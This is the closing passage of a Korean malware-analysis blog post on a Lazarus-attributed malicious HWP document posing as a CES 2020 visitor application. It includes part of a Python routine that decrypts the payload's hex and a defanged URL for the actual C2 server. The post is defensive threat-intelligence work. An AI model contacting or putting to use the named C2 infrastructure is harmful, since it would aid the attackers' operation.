key[3] = int("0x" + mulkey[5] + mulkey[6], 16)
mulkey = mulkey.replace("0x", "")
mulkey = int(mulkey, 16)
key_count = 3
count = 0
tmp = ""
continue
elif(mulkey < 0x1000000):
mulkey = hex(mulkey)
key[0] = int("0x" + "0" + mulkey[2], 16)
key[1] = int("0x" + mulkey[3] + mulkey[4], 16)
key[2] = int("0x" + mulkey[5] + mulkey[6], 16)
key[3] = int("0x" + mulkey[7] + mulkey[8], 16)
mulkey = mulkey.replace("0x", "")
mulkey = int(mulkey, 16)
key_count = 3
count = 0
tmp = ""
continue
elif(mulkey < 0x10000000):
mulkey = hex(mulkey)
key[0] = int("0x" + "0" + "0", 16)
key[1] = int("0x" + mulkey[2] + mulkey[3], 16)
key[2] = int("0x" + mulkey[4] + mulkey[5], 16)
key[3] = int("0x" + mulkey[6] + mulkey[7], 16)
mulkey = mulkey.replace("0x", "")
mulkey = int(mulkey, 16)
key_count = 3
count = 0
tmp = ""
continue
else:
mulkey = hex(mulkey)
key[0] = int("0x" + mulkey[2] + mulkey[3], 16)
key[1] = int("0x" + mulkey[4] + mulkey[5], 16)
key[2] = int("0x" + mulkey[6] + mulkey[7], 16)
key[3] = int("0x" + mulkey[8] + mulkey[9], 16)
mulkey = mulkey.replace("0x", "")
mulkey = int(mulkey, 16)
key_count = 3
count = 0
tmp = ""
print(real_value)
http://colorscripter.com/info#e" target="_blank" style="color:#4f4f4ftext-decoration:none">Colored by Color Scripter
|
http://colorscripter.com/info#e" target="_blank" style="text-decoration:none;color:white">cs |
코드는 대략적으로 위와 같고, 복호화 된 헥스값을 출력해준다!
아래는 복호화 된 헥스 값이고, 갓랩, 갓약에서 분석한 것 처럼 로컬호스트의 kernel32.dll 에 분석을 방해할 목적으로 계속 루프 연결을 지속하는 부분과, 실제 C2 서버가 확인되었다.
C2 서버
| - https://thevagabondsatchel[.]com/wp-content/uploads/2019/09/public[.]avi |
참고하면 좋은 글
'CES 참관단 참가신청서' 내용의 악성 HWP 유포
오늘 안랩 ASEC 분석팀에 '『 미국 라스베가스 CES 2020 참관단』 참가신청서' 내용의 새로운 악성 HWP 한글 문서가 접수되었다. 이번 악성 파일은 한국정보산업연합회에서 최근 온라인에 공지한 CES 참가신청서..
asec.ahnlab.com
https://blog.alyac.co.kr/2581?category=957259
라자루스(Lazarus)그룹, 미국 라스베가스 CES2020 참관단 참가신청서 사칭 APT 공격 정황 포착
안녕하세요 이스트시큐리티 대응센터(ESRC)입니다. 금일 ESRC는 라자루스(Lazarus) 그룹의 사이버 공격정황을 포착하였습니다. 이번 공격은 악성파일이 포함된 이메일을 특정 대상에게 발송하는 방식을 사용하고..
blog.alyac.co.kr
반응형
'Analysis' 카테고리의 다른 글
| 26. Sodinikibi(Specialist) (0) | 2019.11.21 |
|---|---|
| 25. Rich Header (0) | 2019.10.30 |
| 23. Lazarus, 연애심리테스트.xls (0) | 2019.10.24 |
| 22. Kimsuky's HWP malware (6) | 2019.10.21 |
| 21. MageCart(Cobalt?)'s skimmer (0) | 2019.10.15 |
